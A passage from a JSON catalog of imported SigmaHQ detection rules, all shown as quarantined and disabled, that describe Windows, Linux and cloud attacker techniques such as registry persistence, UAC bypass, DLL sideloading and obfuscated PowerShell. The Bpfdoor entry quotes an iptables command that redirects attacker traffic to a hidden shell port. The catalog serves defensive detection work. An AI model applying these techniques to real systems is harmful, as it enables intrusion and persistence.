\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to prepend information to the PATH environment variable on a per-application, per-process basis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-app-paths-default-property.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml" } }, { "id": "sigmahq-sigma-7090adee-82e2-4269-bd59-80691e7c6338", "type": "detection", "name": "Console CodePage Lookup Via CHCP", "description": "Detects use of chcp to look up the system locale value as part of host discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1614.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/console-codepage-lookup-via-chcp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7090adee-82e2-4269-bd59-80691e7c6338", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml" } }, { "id": "sigmahq-sigma-7091372f-623c-4293-bc37-20c32b3492be", "type": "detection", "name": "End User Consent Blocked", "description": "Detects when end user consent is blocked due to risk-based consent.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/end-user-consent-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7091372f-623c-4293-bc37-20c32b3492be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml" } }, { "id": "sigmahq-sigma-70ad0861-d1fe-491c-a45f-fa48148a300d", "type": "detection", "name": "File Download via CertOC.EXE", "description": "Detects when a user downloads a file by using CertOC.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-certoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70ad0861-d1fe-491c-a45f-fa48148a300d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certoc_download.yml" } }, { "id": "sigmahq-sigma-70ad982f-67c8-40e0-a955-b920c2fa05cb", "type": "detection", "name": "Suspicious IO.FileStream", "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-io-filestream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" } }, { "id": "sigmahq-sigma-70b4156e-50fc-4523-aa50-c9dddf1993fc", "type": "detection", "name": "Bpfdoor TCP Ports Redirect", "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bpfdoor-tcp-ports-redirect.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70b4156e-50fc-4523-aa50-c9dddf1993fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_bpfdoor_port_redirect.yml" } }, { "id": "sigmahq-sigma-70bc5215-526f-4477-963c-a47a5c9ebd12", "type": "detection", "name": "Potential Active Directory Enumeration Using AD Module - ProcCreation", "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-active-directory-enumeration-using-ad-module-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70bc5215-526f-4477-963c-a47a5c9ebd12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml" } }, { "id": "sigmahq-sigma-70e8e9b4-6a93-4cb7-8cde-da69502e7aff", "type": "detection", "name": "VMGuestLib DLL Sideload", "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vmguestlib-dll-sideload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vmguestlib.yml" } }, { "id": "sigmahq-sigma-70ed1d26-0050-4b38-a599-92c53d57d45a", "type": "detection", "name": "Bitbucket User Login Failure", "description": "Detects user authentication failure events.\nPlease note that this rule can be noisy and it is recommended to use with correlation based on \"author.name\" field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-user-login-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70ed1d26-0050-4b38-a599-92c53d57d45a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml" } }, { "id": "sigmahq-sigma-70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "type": "detection", "name": "Suspicious Service Installation Script", "description": "Detects suspicious service installation scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-installation-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml" } }, { "id": "sigmahq-sigma-7100f7e3-92ce-4584-b7b7-01b40d3d4118", "type": "detection", "name": "Default Cobalt Strike Certificate", "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/default-cobalt-strike-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" } }, { "id": "sigmahq-sigma-710bdbce-495d-491d-9a8f-7d0d88d2b41e", "type": "detection", "name": "Special File Creation via Mknod Syscall", "description": "Detects usage of the `mknod` syscall to create special files (e.g., character or block devices).\nAttackers or malware might use `mknod` to create fake devices, interact with kernel interfaces,\nor establish covert channels in Linux systems.\nMonitoring the use of `mknod` is important because this syscall is rarely used by legitimate applications,\nand it can be abused to bypass file system restrictions or create backdoors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/special-file-creation-via-mknod-syscall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "710bdbce-495d-491d-9a8f-7d0d88d2b41e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_susp_special_file_creation_via_mknod_syscall.yml" } }, { "id": "sigmahq-sigma-71158e3f-df67-472b-930e-7d287acaa3e1", "type": "detection", "name": "Execution Of Non-Existing File", "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-of-non-existing-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71158e3f-df67-472b-930e-7d287acaa3e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" } }, { "id": "sigmahq-sigma-7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "type": "detection", "name": "Suspicious Kernel Dump Using Dtrace", "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-kernel-dump-using-dtrace.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml" } }, { "id": "sigmahq-sigma-71886b70-d7b4-4dbf-acce-87d2ca135262", "type": "detection", "name": "Suspicious Rejected SMB Guest Logon From IP", "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rejected-smb-guest-logon-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71886b70-d7b4-4dbf-acce-87d2ca135262", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml" } }, { "id": "sigmahq-sigma-7195a772-4b3f-43a4-a210-6a003d65caa1", "type": "detection", "name": "Suspicious User Agent", "description": "Detects suspicious malformed user agent strings in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7195a772-4b3f-43a4-a210-6a003d65caa1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_susp.yml" } }, { "id": "sigmahq-sigma-719c22d7-c11a-4f2c-93a6-2cfdd5412f68", "type": "detection", "name": "Decode Base64 Encoded Text -MacOs", "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/decode-base64-encoded-text-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_base64_decode.yml" } }, { "id": "sigmahq-sigma-71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb", "type": "detection", "name": "Potential Waveedit.DLL Sideloading", "description": "Detects potential DLL sideloading of \"waveedit.dll\", which is part of the Nero WaveEditor audio editing software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-waveedit-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_waveedit.yml" } }, { "id": "sigmahq-sigma-71c276aa-49cd-43d2-b920-2dcd3e6962d5", "type": "detection", "name": "Service Installed By Unusual Client - System", "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-installed-by-unusual-client-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml" } }, { "id": "sigmahq-sigma-71d65515-c436-43c0-841b-236b1f32c21e", "type": "detection", "name": "Cisco File Deletion", "description": "See what files are being deleted from flash file systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1561.001", "T1561.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71d65515-c436-43c0-841b-236b1f32c21e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_file_deletion.yml" } }, { "id": "sigmahq-sigma-71ff406e-b633-4989-96ec-bc49d825a412", "type": "detection", "name": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/zip-a-folder-with-powershell-for-staging-in-temp-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "71ff406e-b633-4989-96ec-bc49d825a412", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" } }, { "id": "sigmahq-sigma-72124974-a68b-4366-b990-d30e0b2a190d", "type": "detection", "name": "Metasploit SMB Authentication", "description": "Alerts on Metasploit host's authentications on the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/metasploit-smb-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72124974-a68b-4366-b990-d30e0b2a190d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_metasploit_authentication.yml" } }, { "id": "sigmahq-sigma-7215374a-de4f-4b33-8ba5-70804c9251d3", "type": "detection", "name": "Bitbucket Unauthorized Access To A Resource", "description": "Detects unauthorized access attempts to a resource.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1586" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-unauthorized-access-to-a-resource.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7215374a-de4f-4b33-8ba5-70804c9251d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml" } }, { "id": "sigmahq-sigma-724ea201-6514-4f38-9739-e5973c34f49a", "type": "detection", "name": "Bypass UAC Using SilentCleanup Task", "description": "Detects the setting of the environement variable \"windir\" to a non default value.\nAttackers often abuse this variable in order to trigger a UAC bypass via the \"SilentCleanup\" task.\nThe SilentCleanup task located in %windir%\\system32\\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-using-silentcleanup-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "724ea201-6514-4f38-9739-e5973c34f49a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" } }, { "id": "sigmahq-sigma-725a9768-0f5e-4cb3-aec2-bc5719c6831a", "type": "detection", "name": "Suspicious Where Execution", "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1217" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-where-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_where_browser_data_recon.yml" } }, { "id": "sigmahq-sigma-727454c0-d851-48b0-8b89-385611ab0704", "type": "detection", "name": "Lolbin Unregmp2.exe Use As Proxy", "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbin-unregmp2-exe-use-as-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "727454c0-d851-48b0-8b89-385611ab0704", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml" } }, { "id": "sigmahq-sigma-7280c9f3-a5af-45d0-916a-bc01cb4151c9", "type": "detection", "name": "Suspicious MSExchangeMailboxReplication ASPX Write", "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msexchangemailboxreplication-aspx-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml" } }, { "id": "sigmahq-sigma-72862bf2-0eb1-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher - System", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72862bf2-0eb1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml" } }, { "id": "sigmahq-sigma-729ce0ea-5d8f-4769-9762-e35de441586d", "type": "detection", "name": "MpiExec Lolbin", "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mpiexec-lolbin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "729ce0ea-5d8f-4769-9762-e35de441586d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_mpiexec.yml" } }, { "id": "sigmahq-sigma-72a0369a-2576-4aaf-bfc9-6bb24a574ac6", "type": "detection", "name": "Delete Defender Scan ShellEx Context Menu Registry Key", "description": "Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/delete-defender-scan-shellex-context-menu-registry-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "72a0369a-2576-4aaf-bfc9-6bb24a574ac6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_defender_context_menu.yml" } }, { "id": "sigmahq-sigma-72af37e2-ec32-47dc-992b-bc288a2708cb", "type": "detection", "name": "Azure New CloudShell Created", "description": "Identifies when a new cloudshell is created inside of Azure portal.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-new-cloudshell-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly 